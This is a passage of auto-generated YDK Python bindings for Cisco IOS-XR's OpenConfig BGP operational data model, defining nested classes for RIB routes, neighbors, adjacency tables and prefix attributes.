self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.ExtAttributesList.ExtCommunity, ['objects'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.ExtAttributesList.ExtCommunity']['meta_info']
class UnknownAttributes(_Entity_):
"""
UnknownAttributes
.. attribute:: attribute_type
AttributeType
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: attribute_length
AttributeLength
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: attribute_value
Atributevalue
**type**\: str
**pattern:** ([0\-9a\-fA\-F]{2}(\:[0\-9a\-fA\-F]{2})\*)?
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.ExtAttributesList.UnknownAttributes, self).__init__()
self.yang_name = "unknown-attributes"
self.yang_parent_name = "ext-attributes-list"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('attribute_type', (YLeaf(YType.uint16, 'attribute-type'), ['int'])),
('attribute_length', (YLeaf(YType.uint16, 'attribute-length'), ['int'])),
('attribute_value', (YLeaf(YType.str, 'attribute-value'), ['str'])),
])
self.attribute_type = None
self.attribute_length = None
self.attribute_value = None
self._segment_path = lambda: "unknown-attributes"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv4-unicast/loc-rib/routes/route/ext-attributes-list/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.ExtAttributesList.UnknownAttributes, ['attribute_type', 'attribute_length', 'attribute_value'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.ExtAttributesList.UnknownAttributes']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.ExtAttributesList']['meta_info']
class LastModifiedDate(_Entity_):
"""
LastModifiedDate
.. attribute:: time_value
TimeValue
**type**\: str
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.LastModifiedDate, self).__init__()
self.yang_name = "last-modified-date"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('time_value', (YLeaf(YType.str, 'time-value'), ['str'])),
])
self.time_value = None
self._segment_path = lambda: "last-modified-date"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv4-unicast/loc-rib/routes/route/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.LastModifiedDate, ['time_value'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.LastModifiedDate']['meta_info']
class LastUpdateRecieved(_Entity_):
"""
LastUpdateRecieved
.. attribute:: time_value
TimeValue
**type**\: str
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.LastUpdateRecieved, self).__init__()
self.yang_name = "last-update-recieved"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('time_value', (YLeaf(YType.str, 'time-value'), ['str'])),
])
self.time_value = None
self._segment_path = lambda: "last-update-recieved"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv4-unicast/loc-rib/routes/route/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.LastUpdateRecieved, ['time_value'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.LastUpdateRecieved']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes']['meta_info']
class NumRoutes(_Entity_):
"""
Number of routes in adjacency rib out\-bound
post\-policy table
.. attribute:: num_routes
NumRoutes
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.NumRoutes, self).__init__()
self.yang_name = "num-routes"
self.yang_parent_name = "loc-rib"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('num_routes', (YLeaf(YType.uint64, 'num-routes'), ['int'])),
])
self.num_routes = None
self._segment_path = lambda: "num-routes"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv4-unicast/loc-rib/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.NumRoutes, ['num_routes'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.NumRoutes']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib']['meta_info']
class OpenConfigNeighbors(_Entity_):
"""
Neighbor list
.. attribute:: open_config_neighbor
Neighbor name
**type**\: list of :py:class:`OpenConfigNeighbor <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors, self).__init__()
self.yang_name = "open-config-neighbors"
self.yang_parent_name = "ipv4-unicast"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("open-config-neighbor", ("open_config_neighbor", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor))])
self._leafs = OrderedDict()
self.open_config_neighbor = YList(self)
self._segment_path = lambda: "open-config-neighbors"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv4-unicast/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors, [], name, value)
class OpenConfigNeighbor(_Entity_):
"""
Neighbor name
.. attribute:: neighbor_address (key)
Neighbor Address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: adj_rib_in_post
Adjacency rib in\-bound post\-policy table
**type**\: :py:class:`AdjRibInPost <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost>`
**config**\: False
.. attribute:: adj_rib_out_post
Adjacency rib out\-bound post\-policy table
**type**\: :py:class:`AdjRibOutPost <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost>`
**config**\: False
.. attribute:: adj_rib_out_pre
Adjacency rib out\-bound pre\-policy table
**type**\: :py:class:`AdjRibOutPre <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre>`
**config**\: False
.. attribute:: adj_rib_in_pre
Adjacency rib in\-bound pre\-policy table
**type**\: :py:class:`AdjRibInPre <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor, self).__init__()
self.yang_name = "open-config-neighbor"
self.yang_parent_name = "open-config-neighbors"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['neighbor_address']
self._child_classes = OrderedDict([("adj-rib-in-post", ("adj_rib_in_post", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost)), ("adj-rib-out-post", ("adj_rib_out_post", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost)), ("adj-rib-out-pre", ("adj_rib_out_pre", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre)), ("adj-rib-in-pre", ("adj_rib_in_pre", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre))])
self._leafs = OrderedDict([
('neighbor_address', (YLeaf(YType.str, 'neighbor-address'), ['str','str'])),
])
self.neighbor_address = None
self.adj_rib_in_post = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost()
self.adj_rib_in_post.parent = self
self._children_name_map["adj_rib_in_post"] = "adj-rib-in-post"
self.adj_rib_out_post = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost()
self.adj_rib_out_post.parent = self
self._children_name_map["adj_rib_out_post"] = "adj-rib-out-post"
self.adj_rib_out_pre = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre()
self.adj_rib_out_pre.parent = self
self._children_name_map["adj_rib_out_pre"] = "adj-rib-out-pre"
self.adj_rib_in_pre = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre()
self.adj_rib_in_pre.parent = self
self._children_name_map["adj_rib_in_pre"] = "adj-rib-in-pre"
self._segment_path = lambda: "open-config-neighbor" + "[neighbor-address='" + str(self.neighbor_address) + "']"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv4-unicast/open-config-neighbors/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor, ['neighbor_address'], name, value)
class AdjRibInPost(_Entity_):
"""
Adjacency rib in\-bound post\-policy table
.. attribute:: routes
routes table
**type**\: :py:class:`Routes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes>`
**config**\: False
.. attribute:: num_routes
Number of routes in adjacency rib out\-bound post\-policy table
**type**\: :py:class:`NumRoutes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.NumRoutes>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost, self).__init__()
self.yang_name = "adj-rib-in-post"
self.yang_parent_name = "open-config-neighbor"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("routes", ("routes", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes)), ("num-routes", ("num_routes", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.NumRoutes))])
self._leafs = OrderedDict()
self.routes = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes()
self.routes.parent = self
self._children_name_map["routes"] = "routes"
self.num_routes = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.NumRoutes()
self.num_routes.parent = self
self._children_name_map["num_routes"] = "num-routes"
self._segment_path = lambda: "adj-rib-in-post"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost, [], name, value)
class Routes(_Entity_):
"""
routes table
.. attribute:: route
route entry
**type**\: list of :py:class:`Route <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes, self).__init__()
self.yang_name = "routes"
self.yang_parent_name = "adj-rib-in-post"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("route", ("route", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route))])
self._leafs = OrderedDict()
self.route = YList(self)
self._segment_path = lambda: "routes"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes, [], name, value)
class Route(_Entity_):
"""
route entry
.. attribute:: route
Network in prefix/length format
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])/(([0\-9])\|([1\-2][0\-9])\|(3[0\-2]))
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(/(([0\-9])\|([0\-9]{2})\|(1[0\-1][0\-9])\|(12[0\-8])))
**config**\: False
.. attribute:: neighbor_address
Neighbor address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: path_id
Path ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: prefix_name
Prefix
**type**\: :py:class:`PrefixName <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.PrefixName>`
**config**\: False
.. attribute:: route_attr_list
RouteAttributesList
**type**\: :py:class:`RouteAttrList <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList>`
**config**\: False
.. attribute:: ext_attributes_list
ExtAttributesList
**type**\: :py:class:`ExtAttributesList <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList>`
**config**\: False
.. attribute:: last_modified_date
LastModifiedDate
**type**\: :py:class:`LastModifiedDate <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.LastModifiedDate>`
**config**\: False
.. attribute:: last_update_recieved
LastUpdateRecieved
**type**\: :py:class:`LastUpdateRecieved <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.LastUpdateRecieved>`
**config**\: False
.. attribute:: valid_route
ValidRoute
**type**\: bool
**config**\: False
.. attribute:: invalid_reason
IndentityRef
**type**\: :py:class:`BgpOcInvalidRouteReason <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcInvalidRouteReason>`
**config**\: False
.. attribute:: best_path
BestPath
**type**\: bool
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route, self).__init__()
self.yang_name = "route"
self.yang_parent_name = "routes"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("prefix-name", ("prefix_name", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.PrefixName)), ("route-attr-list", ("route_attr_list", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList)), ("ext-attributes-list", ("ext_attributes_list", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList)), ("last-modified-date", ("last_modified_date", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.LastModifiedDate)), ("last-update-recieved", ("last_update_recieved", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.LastUpdateRecieved))])
self._leafs = OrderedDict([
('route', (YLeaf(YType.str, 'route'), ['str','str'])),
('neighbor_address', (YLeaf(YType.str, 'neighbor-address'), ['str','str'])),
('path_id', (YLeaf(YType.uint32, 'path-id'), ['int'])),
('valid_route', (YLeaf(YType.boolean, 'valid-route'), ['bool'])),
('invalid_reason', (YLeaf(YType.enumeration, 'invalid-reason'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcInvalidRouteReason', '')])),
('best_path', (YLeaf(YType.boolean, 'best-path'), ['bool'])),
])
self.route = None
self.neighbor_address = None
self.path_id = None
self.valid_route = None
self.invalid_reason = None
self.best_path = None
self.prefix_name = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.PrefixName()
self.prefix_name.parent = self
self._children_name_map["prefix_name"] = "prefix-name"
self.route_attr_list = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList()
self.route_attr_list.parent = self
self._children_name_map["route_attr_list"] = "route-attr-list"
self.ext_attributes_list = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList()
self.ext_attributes_list.parent = self
self._children_name_map["ext_attributes_list"] = "ext-attributes-list"
self.last_modified_date = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.LastModifiedDate()
self.last_modified_date.parent = self
self._children_name_map["last_modified_date"] = "last-modified-date"
self.last_update_recieved = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.LastUpdateRecieved()
self.last_update_recieved.parent = self
self._children_name_map["last_update_recieved"] = "last-update-recieved"
self._segment_path = lambda: "route"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route, ['route', 'neighbor_address', 'path_id', 'valid_route', 'invalid_reason', 'best_path'], name, value)
class PrefixName(_Entity_):
"""
Prefix
.. attribute:: prefix
Prefix
**type**\: :py:class:`Prefix <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.PrefixName.Prefix>`
**config**\: False
.. attribute:: prefix_length
Prefix length
**type**\: int
**range:** 0..255
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.PrefixName, self).__init__()
self.yang_name = "prefix-name"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("prefix", ("prefix", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.PrefixName.Prefix))])
self._leafs = OrderedDict([
('prefix_length', (YLeaf(YType.uint8, 'prefix-length'), ['int'])),
])
self.prefix_length = None
self.prefix = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.PrefixName.Prefix()
self.prefix.parent = self
self._children_name_map["prefix"] = "prefix"
self._segment_path = lambda: "prefix-name"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.PrefixName, ['prefix_length'], name, value)
class Prefix(_Entity_):
"""
Prefix
.. attribute:: afi
AFI
**type**\: :py:class:`BgpOcAfi <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcAfi>`
**config**\: False
.. attribute:: ipv4_address
IPv4 Addr
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: ipv6_address
IPv6 Addr
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.PrefixName.Prefix, self).__init__()
self.yang_name = "prefix"
self.yang_parent_name = "prefix-name"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('afi', (YLeaf(YType.enumeration, 'afi'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcAfi', '')])),
('ipv4_address', (YLeaf(YType.str, 'ipv4-address'), ['str'])),
('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
])
self.afi = None
self.ipv4_address = None
self.ipv6_address = None
self._segment_path = lambda: "prefix"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.PrefixName.Prefix, ['afi', 'ipv4_address', 'ipv6_address'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.PrefixName.Prefix']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.PrefixName']['meta_info']
